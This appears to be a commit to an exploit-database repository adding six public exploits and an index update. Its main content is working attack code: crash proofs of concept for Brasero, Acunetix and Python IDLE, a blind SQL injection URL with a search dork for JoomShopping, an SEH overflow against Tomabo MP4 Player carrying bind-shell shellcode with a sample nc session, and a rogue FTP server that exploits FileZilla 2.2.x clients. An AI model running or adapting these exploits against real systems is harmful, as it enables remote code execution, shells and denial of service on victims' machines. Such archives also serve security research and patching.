DB: 2015-08-09

6 new exploits
2015-08-09 05:02:36 +00:00 · 2015-08-09 05:02:36 +00:00 · 648b463161
commit 648b463161
parent 84f888e59b
7 changed files with 420 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -34040,10 +34040,12 @@ id,file,description,date,author,platform,type,port
 37709,platforms/php/webapps/37709.txt,"phpFileManager 0.9.8 - Remote Command Execution Vulnerability",2015-07-28,"John Page",php,webapps,0
 37710,platforms/linux/local/37710.txt,"Sudo <=1.8.14 - Unauthorized Privilege",2015-07-28,"daniel svartman",linux,local,0
 37712,platforms/php/webapps/37712.txt,"phpFileManager 0.9.8 - CSRF Vulnerability",2015-07-29,"John Page",php,webapps,80
 37714,platforms/php/webapps/37714.txt,"JoomShopping - Blind SQL Injection",2015-07-29,Mormoroth,php,webapps,80
 37715,platforms/php/webapps/37715.txt,"Tendoo CMS 1.3 - XSS Vulnerabilities",2015-07-29,"Arash Khazaei",php,webapps,80
 37716,platforms/windows/local/37716.c,"Heroes of Might and Magic III - Map Parsing Arbitrary Code Execution",2015-07-29,"John AAkerblom",windows,local,0
 37717,platforms/windows/dos/37717.pl,"KMPlayer 3.9.x - .srt Crash PoC",2015-07-31,"Peyman Motevalli Manesh",windows,dos,0
 37718,platforms/windows/dos/37718.py,"T-Mobile Internet Manager - Contact Name Crash PoC",2015-07-31,"SATHISH ARTHAR",windows,dos,0
 37719,platforms/windows/dos/37719.py,"Acunetix Web Vulnerability Scanner 9.5 - Crash PoC",2015-07-31,"Hadi Zomorodi Monavar",windows,dos,0
 37720,platforms/hardware/webapps/37720.py,"NETGEAR ReadyNAS LAN /dbbroker 6.2.4 - Credential Disclosure",2015-07-31,St0rn,hardware,webapps,0
 37721,platforms/multiple/dos/37721.c,"BIND9 - TKEY PoC",2015-08-01,"Errata Security",multiple,dos,0
 37722,platforms/linux/local/37722.c,"Linux Privilege Escalation Due to Nested NMIs Interrupting espfix64",2015-08-05,"Andrew Lutomirski",linux,local,0
@ -34051,9 +34053,13 @@ id,file,description,date,author,platform,type,port
 37724,platforms/linux/local/37724.asm,"Linux x86 Memory Sinkhole Privilege Escalation PoC",2015-08-07,"Christopher Domas",linux,local,0
 37725,platforms/php/webapps/37725.txt,"Froxlor Server Management Panel 0.9.33.1 - MySQL Login Information Disclosure",2015-08-07,"Dustin Dörr",php,webapps,0
 37726,platforms/php/webapps/37726.txt,"PHP News Script 4.0.0 - SQL Injection",2015-08-07,"Meisam Monsef",php,webapps,80
 37727,platforms/windows/dos/37727.py,"Python IDLE 2.7.8 - Crash PoC",2015-08-07,"Hadi Zomorodi Monavar",windows,dos,0
 37729,platforms/windows/remote/37729.py,"Filezilla Client 2.2.X - SEH Buffer Overflow Exploit",2015-08-07,ly0n,windows,remote,0
 37730,platforms/windows/local/37730.py,"Tomabo MP4 Player 3.11.3 - (.m3u) SEH Buffer Overflow",2015-08-07,"Saeid Atabaki",windows,local,0
 37731,platforms/windows/remote/37731.py,"PCMan FTP Server 2.0.7 - PUT Command Buffer Overflow",2015-08-07,"Jay Turla",windows,remote,21
 37732,platforms/win32/local/37732.c,"Windows NDProxy Privilege Escalation XP SP3 x86 and 2003 SP2 x86 (MS14-002)",2015-08-07,"Tomislav Paskalev",win32,local,0
 37734,platforms/php/webapps/37734.html,"Microweber 1.0.3 - Stored XSS And CSRF Add Admin Exploit",2015-08-07,LiquidWorm,php,webapps,80
 37735,platforms/php/webapps/37735.txt,"Microweber 1.0.3 File Upload Filter Bypass Remote PHP Code Execution",2015-08-07,LiquidWorm,php,webapps,80
 37738,platforms/php/webapps/37738.txt,"WordPress Job Manager Plugin 0.7.22 - Persistent XSS",2015-08-07,"Owais Mehtab",php,webapps,80
 37739,platforms/windows/dos/37739.py,"Dell Netvault Backup 10.0.1.24 - Denial of Service",2015-08-07,"Josep Pi Rodriguez",windows,dos,20031
 37743,platforms/linux/dos/37743.pl,"Brasero - Crash Proof Of Concept",2015-08-08,"Mohammad Reza Espargham",linux,dos,0
--- a/platforms/linux/dos/37743.pl
+++ b/platforms/linux/dos/37743.pl
@ -0,0 +1,43 @@
 #!/usr/bin/perl -w
 # Title : Kali (brasero) - Crash Proof Of Concept
 # website : https://www.kali.org/downloads/
 # Tested : kali 1.x
 #
 #
 # Author      :   Mohammad Reza Espargham
 # Linkedin    :   https://ir.linkedin.com/in/rezasp
 # E-Mail      :   me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
 # Website     :   www.reza.es
 # Twitter     :   https://twitter.com/rezesp
 # FaceBook    :   https://www.facebook.com/mohammadreza.espargham
 #
 #
 #Demo : http://youtu.be/XMu5ZXupbOI
 system(($^O eq 'MSWin32') ? 'cls' : 'clear');
 $path="/tmp/r3z4.m3u";
 my $PoC = "\x41" x 10000 ;
 open(crash , ">", $path);
 print crash $PoC;
 close(crash);
 use threads;
 sub check_app {   #thread sub
    system("brasero $path");
    return 0;
 }
 my @threads;
 for (my $i = 0; $i < 20; $i++) {
    my $thread = threads->create(\&check_app);
    push(@threads, $thread);
 }
 foreach (@threads) { #join
    $_->join();
 }
--- a/platforms/php/webapps/37714.txt
+++ b/platforms/php/webapps/37714.txt
@ -0,0 +1,11 @@
 # Exploit Title: [JoomShopping Blind Sql injection]
 # Google Dork: [allinurl:"/modules/mod_jshopping_products_wfl/js/"]
 # Date: [2015-07-24]
 # Exploit Author: [Mormoroth]
 # Vendor Homepage: [http://www.webdesigner-profi.de]
 # Software Link: [http://www.webdesigner-profi.de/joomla-webdesign/joomla-shop/downloads.html]
 # Version: [All] 
 # Tested on: [Linux]
 ----------------------------
 site/modules/mod_jshopping_products_wfl/js/settings.php?id=209 and 1=2-- a
 ----------------------------
--- a/platforms/windows/dos/37719.py
+++ b/platforms/windows/dos/37719.py
@ -0,0 +1,21 @@
 #!/usr/bin/env python
 # Title : Acunetix Web Vulnerability Scanner 9.5 - Crash Proof Of Concept
 # Website : https://www.acunetix.com
 # Tested : win 7 / win 8.1 / win vista
 #
 #
 # Author      :   Hadi Zomorodi Monavar
 # Email       :   zomorodihadi@gmail.com
 #
 # 1 . run python code : python poc.py
 # 2 . open hadi.txt and copy content to clipboard
 # 3 . open "Acunetix Web Vulnerability Scanner 9.5"
 # 4 . from Tools Explorer --> subdomain scanner
 # 5 . Paste ClipBoard on "Domain"
 # 6 . Click start
 # 7 . Crashed ;)
 crash = "\x41"*9000 #B0F
 file = open("hadi.txt", "w")
 file.write(crash)
 file.close()
--- a/platforms/windows/dos/37727.py
+++ b/platforms/windows/dos/37727.py
@ -0,0 +1,21 @@
 #!/usr/bin/env python
 # Title : Python IDLE 2.7.8  - Crash Proof Of Concept
 # Website : http://www.python.org/idle/
 # Tested : Windows 7 / Windows 8.1
 #
 #
 # Author      :   Hadi Zomorodi Monavar
 # Email       :   zomorodihadi@gmail.com
 #
 # 1 . run python code : python poc.py
 # 2 . open r3z4.txt and copy content to clipboard
 # 3 . open "python 2.7.8 IDLE"
 # 4 . from Menu (edit --> find)
 # 5 . Paste ClipBoard on "find"
 # 6 . Enter
 # 7 . Crashed ;)
 crash = "\x41"*900000 #B0F
 file = open("r3z4.txt", "w")
 file.write(crash)
 file.close()
--- a/platforms/windows/local/37730.py
+++ b/platforms/windows/local/37730.py
@ -0,0 +1,58 @@
 #!/usr/bin/python
 # Exploit Title: Tomabo MP4 Player 3.11.3 - (.m3u) SEH Buffer Overflow 
 # Date: 03/08/2015
 # Exploit Author: Saeid Atabaki
 # E-Mail: bytecod3r <at> gmail.com, saeid <at> Nsecurity.org
 # Linkedin: https://www.linkedin.com/in/saeidatabaki
 # Vendor Homepage: http://tomabo.com/mp4-player/index.html
 # Version: 3.11.3
 # Tested on: Windows XP SP3
 #---------------------------------------------------------------------#
 # Badchars: "\x00\x0a\x0d\x0c\x20\x09\x1a"'
 #
 # nc 192.168.11.136 8080
 # Microsoft Windows XP [Version 5.1.2600]
 # (C) Copyright 1985-2001 Microsoft Corp.
 #
 # C:\Documents and Settings\Administrator\Desktop>
 #---------------------------------------------------------------------# 
 import sys, struct
 file="crash.m3u"
 # Windows bind shell port 8080, feel free to swap shellcode
 sc =  ""
 sc += "\xdd\xc1\xd9\x74\x24\xf4\xb8\xd3\x4b\xb2\xa4\x5d\x31"
 sc += "\xc9\xb1\x53\x31\x45\x17\x83\xc5\x04\x03\x96\x58\x50"
 sc += "\x51\xe4\xb7\x16\x9a\x14\x48\x77\x12\xf1\x79\xb7\x40"
 sc += "\x72\x29\x07\x02\xd6\xc6\xec\x46\xc2\x5d\x80\x4e\xe5"
 sc += "\xd6\x2f\xa9\xc8\xe7\x1c\x89\x4b\x64\x5f\xde\xab\x55"
 sc += "\x90\x13\xaa\x92\xcd\xde\xfe\x4b\x99\x4d\xee\xf8\xd7"
 sc += "\x4d\x85\xb3\xf6\xd5\x7a\x03\xf8\xf4\x2d\x1f\xa3\xd6"
 sc += "\xcc\xcc\xdf\x5e\xd6\x11\xe5\x29\x6d\xe1\x91\xab\xa7"
 sc += "\x3b\x59\x07\x86\xf3\xa8\x59\xcf\x34\x53\x2c\x39\x47"
 sc += "\xee\x37\xfe\x35\x34\xbd\xe4\x9e\xbf\x65\xc0\x1f\x13"
 sc += "\xf3\x83\x2c\xd8\x77\xcb\x30\xdf\x54\x60\x4c\x54\x5b"
 sc += "\xa6\xc4\x2e\x78\x62\x8c\xf5\xe1\x33\x68\x5b\x1d\x23"
 sc += "\xd3\x04\xbb\x28\xfe\x51\xb6\x73\x97\x96\xfb\x8b\x67"
 sc += "\xb1\x8c\xf8\x55\x1e\x27\x96\xd5\xd7\xe1\x61\x19\xc2"
 sc += "\x56\xfd\xe4\xed\xa6\xd4\x22\xb9\xf6\x4e\x82\xc2\x9c"
 sc += "\x8e\x2b\x17\x08\x86\x8a\xc8\x2f\x6b\x6c\xb9\xef\xc3"
 sc += "\x05\xd3\xff\x3c\x35\xdc\xd5\x55\xde\x21\xd6\x46\x8f"
 sc += "\xaf\x30\x12\xbf\xf9\xeb\x8a\x7d\xde\x23\x2d\x7d\x34"
 sc += "\x1c\xd9\x36\x5e\x9b\xe6\xc6\x74\x8b\x70\x4d\x9b\x0f"
 sc += "\x61\x52\xb6\x27\xf6\xc5\x4c\xa6\xb5\x74\x50\xe3\x2d"
 sc += "\x14\xc3\x68\xad\x53\xf8\x26\xfa\x34\xce\x3e\x6e\xa9"
 sc += "\x69\xe9\x8c\x30\xef\xd2\x14\xef\xcc\xdd\x95\x62\x68"
 sc += "\xfa\x85\xba\x71\x46\xf1\x12\x24\x10\xaf\xd4\x9e\xd2"
 sc += "\x19\x8f\x4d\xbd\xcd\x56\xbe\x7e\x8b\x56\xeb\x08\x73"
 sc += "\xe6\x42\x4d\x8c\xc7\x02\x59\xf5\x35\xb3\xa6\x2c\xfe"
 sc += "\xc3\xec\x6c\x57\x4c\xa9\xe5\xe5\x11\x4a\xd0\x2a\x2c"
 sc += "\xc9\xd0\xd2\xcb\xd1\x91\xd7\x90\x55\x4a\xaa\x89\x33"
 sc += "\x6c\x19\xa9\x11"
 payload = "\x90" * 1028 + "\xeb\x18\x90\x90" + "\x69\x9e\x48\x00"  + "\x90" * 20 + sc
 writeFile = open (file, "w")
 writeFile.write( payload )
 writeFile.close()
--- a/platforms/windows/remote/37729.py
+++ b/platforms/windows/remote/37729.py
@ -0,0 +1,260 @@
 # Exploit Title: Filezilla client 2.2.X SEH buffer overflow exploit
 # Date: 02/08/2015
 # Exploit Author: ly0n
 # Vendor Homepage: filezilla-project.org/
 # Software Link: http://www.oldapps.com/filezilla.php?app=7cdf14e88e9dfa85fb661c1c6e649e90
 # Version: tested on filezilla 2.2.21
 # Tested on: Windows XP sp3 english
 #!/usr/bin/env python2
 # coding: utf-8
 import os,socket,threading,time
 #import traceback
 # visit: ly0n.me
 # greetz: NBS
 #MSGBOX "BrokenByte" 
 msgbox = ("\x68\x6e\x33\x72\x00\x68\x75\x74"
 "\x69\x30\x68\x5e\x58\x65\x63\x89"
 "\xe3\x68\x20\x20\x20\x00\x68\x68"
 "\x65\x72\x65\x68\x77\x61\x73\x20"
 "\x68\x6e\x33\x72\x20\x68\x75\x74"
 "\x69\x30\x68\x5e\x58\x65\x63\x89"
 "\xe1\x31\xc0\x50\x53\x51\x50\x50"
 "\xbe\xea\x07\x45\x7e\xff\xe6\x31"
 "\xc0\x50\xb8\x12\xcb\x81\x7c\xff"
 "\xe0")
 nops = "\x90" * 100
 #77EA9CAC    POP POP RET kernel32.dll <- seh
 #EB069090    SHORT JUMP 6 POS + 2 NOPS  <- nseh
 nseh = "\xeb\x06\x90\x90"
 seh = "\xAC\x9C\xEA\x77" 
 allow_delete = False
 local_ip = "192.168.11.6" #SERVER LOCAL IP
 local_port = 21 #DESIRED PORT
 buffer1 = "\x41" * 1896 + nseh  + seh + nops + msgbox + nops
 buffer = buffer1 + ".txt"
 currdir=os.path.abspath('.')
 class FTPserverThread(threading.Thread):
    def __init__(self,(conn,addr)):
        self.conn=conn
        self.addr=addr
        self.basewd=currdir
        self.cwd=self.basewd
        self.rest=False
        self.pasv_mode=False
        threading.Thread.__init__(self)
    def run(self):
        self.conn.send('220 Welcome!\r\n')
        while True:
            cmd=self.conn.recv(256)
            if not cmd: break
            else:
                print 'Recieved:',cmd
                try:
                    func=getattr(self,cmd[:4].strip().upper())
                    func(cmd)
                except Exception,e:
                    print 'ERROR:',e
                    #traceback.print_exc()
                    self.conn.send('500 Sorry.\r\n')
    def SYST(self,cmd):
        self.conn.send('215 UNIX Type: L8\r\n')
    def OPTS(self,cmd):
        if cmd[5:-2].upper()=='UTF8 ON':
            self.conn.send('200 OK.\r\n')
        else:
            self.conn.send('451 Sorry.\r\n')
    def USER(self,cmd):
        self.conn.send('331 OK.\r\n')
    def PASS(self,cmd):
        self.conn.send('230 OK.\r\n')
        #self.conn.send('530 Incorrect.\r\n')
    def QUIT(self,cmd):
        self.conn.send('221 Goodbye.\r\n')
    def NOOP(self,cmd):
        self.conn.send('200 OK.\r\n')
    def TYPE(self,cmd):
        self.mode=cmd[5]
        self.conn.send('200 Binary mode.\r\n')
    def CDUP(self,cmd):
        if not os.path.samefile(self.cwd,self.basewd):
            #learn from stackoverflow
            self.cwd=os.path.abspath(os.path.join(self.cwd,'..'))
        self.conn.send('200 OK.\r\n')
    def PWD(self,cmd):
        cwd=os.path.relpath(self.cwd,self.basewd)
        if cwd=='.':
            cwd='/'
        else:
            cwd='/'+cwd
        self.conn.send('257 \"%s\"\r\n' % cwd)
    def CWD(self,cmd):
        chwd=cmd[4:-2]
        if chwd=='/':
            self.cwd=self.basewd
        elif chwd[0]=='/':
            self.cwd=os.path.join(self.basewd,chwd[1:])
        else:
            self.cwd=os.path.join(self.cwd,chwd)
        self.conn.send('250 OK.\r\n')
    def PORT(self,cmd):
        if self.pasv_mode:
            self.servsock.close()
            self.pasv_mode = False
        l=cmd[5:].split(',')
        self.dataAddr='.'.join(l[:4])
        self.dataPort=(int(l[4])<<8)+int(l[5])
        self.conn.send('200 Get port.\r\n')
    def PASV(self,cmd): # from http://goo.gl/3if2U
        self.pasv_mode = True
        self.servsock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        self.servsock.bind((local_ip,0))
        self.servsock.listen(1)
        ip, port = self.servsock.getsockname()
        print 'open', ip, port
        self.conn.send('227 Entering Passive Mode (%s,%u,%u).\r\n' %
                (','.join(ip.split('.')), port>>8&0xFF, port&0xFF))
    def start_datasock(self):
        if self.pasv_mode:
            self.datasock, addr = self.servsock.accept()
            print 'connect:', addr
        else:
            self.datasock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
            self.datasock.connect((self.dataAddr,self.dataPort))
    def stop_datasock(self):
        self.datasock.close()
        if self.pasv_mode:
            self.servsock.close()
    def LIST(self,cmd):
        self.conn.send('150 Here comes the directory listing.\r\n')
        print 'list:', self.cwd
        self.start_datasock()
 	dirlist = "drwxrwxrwx    1 100      0           11111 Jun 11 21:10" +buffer1+"\r\n\n"
 	dirlist += "-rw-rw-r--    1 1176     1176         1060 Aug 16 22:22  "+buffer+" \r\n\n"
 	self.datasock.send("total 2\r\n"+dirlist)
        self.stop_datasock()
        self.conn.send('226 Directory send OK.\r\n')
    def toListItem(self,fn):
        st=os.stat(fn)
        fullmode='rwxrwxrwx'
        mode=''
        for i in range(9):
            mode+=((st.st_mode>>(8-i))&1) and fullmode[i] or '-'
        d=(os.path.isdir(fn)) and 'd' or '-'
        ftime=time.strftime(' %b %d %H:%M ', time.gmtime(st.st_mtime))
        return d+mode+' 1 user group '+str(st.st_size)+ftime+os.path.basename(fn)
    def MKD(self,cmd):
        dn=os.path.join(self.cwd,cmd[4:-2])
        os.mkdir(dn)
        self.conn.send('257 Directory created.\r\n')
    def RMD(self,cmd):
        dn=os.path.join(self.cwd,cmd[4:-2])
        if allow_delete:
            os.rmdir(dn)
            self.conn.send('250 Directory deleted.\r\n')
        else:
            self.conn.send('450 Not allowed.\r\n')
    def DELE(self,cmd):
        fn=os.path.join(self.cwd,cmd[5:-2])
        if allow_delete:
            os.remove(fn)
            self.conn.send('250 File deleted.\r\n')
        else:
            self.conn.send('450 Not allowed.\r\n')
    def RNFR(self,cmd):
        self.rnfn=os.path.join(self.cwd,cmd[5:-2])
        self.conn.send('350 Ready.\r\n')
    def RNTO(self,cmd):
        fn=os.path.join(self.cwd,cmd[5:-2])
        os.rename(self.rnfn,fn)
        self.conn.send('250 File renamed.\r\n')
    def REST(self,cmd):
        self.pos=int(cmd[5:-2])
        self.rest=True
        self.conn.send('250 File position reseted.\r\n')
    def RETR(self,cmd):
        fn=os.path.join(self.cwd,cmd[5:-2])
        #fn=os.path.join(self.cwd,cmd[5:-2]).lstrip('/')
        print 'Downlowding:',fn
        if self.mode=='I':
            fi=open(fn,'rb')
        else:
            fi=open(fn,'r')
        self.conn.send('150 Opening data connection.\r\n')
        if self.rest:
            fi.seek(self.pos)
            self.rest=False
        data= fi.read(1024)
        self.start_datasock()
        while data:
            self.datasock.send(data)
            data=fi.read(1024)
        fi.close()
        self.stop_datasock()
        self.conn.send('226 Transfer complete.\r\n')
    def STOR(self,cmd):
        fn=os.path.join(self.cwd,cmd[5:-2])
        print 'Uplaoding:',fn
        if self.mode=='I':
            fo=open(fn,'wb')
        else:
            fo=open(fn,'w')
        self.conn.send('150 Opening data connection.\r\n')
        self.start_datasock()
        while True:
            data=self.datasock.recv(1024)
            if not data: break
            fo.write(data)
        fo.close()
        self.stop_datasock()
        self.conn.send('226 Transfer complete.\r\n')
 class FTPserver(threading.Thread):
    def __init__(self):
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.bind((local_ip,local_port))
        threading.Thread.__init__(self)
    def run(self):
        self.sock.listen(5)
        while True:
            th=FTPserverThread(self.sock.accept())
            th.daemon=True
            th.start()
    def stop(self):
        self.sock.close()
 if __name__=='__main__':
    ftp=FTPserver()
    ftp.daemon=True
    ftp.start()
    print 'On', local_ip, ':', local_port
    raw_input('Enter to end...\n')
    ftp.stop()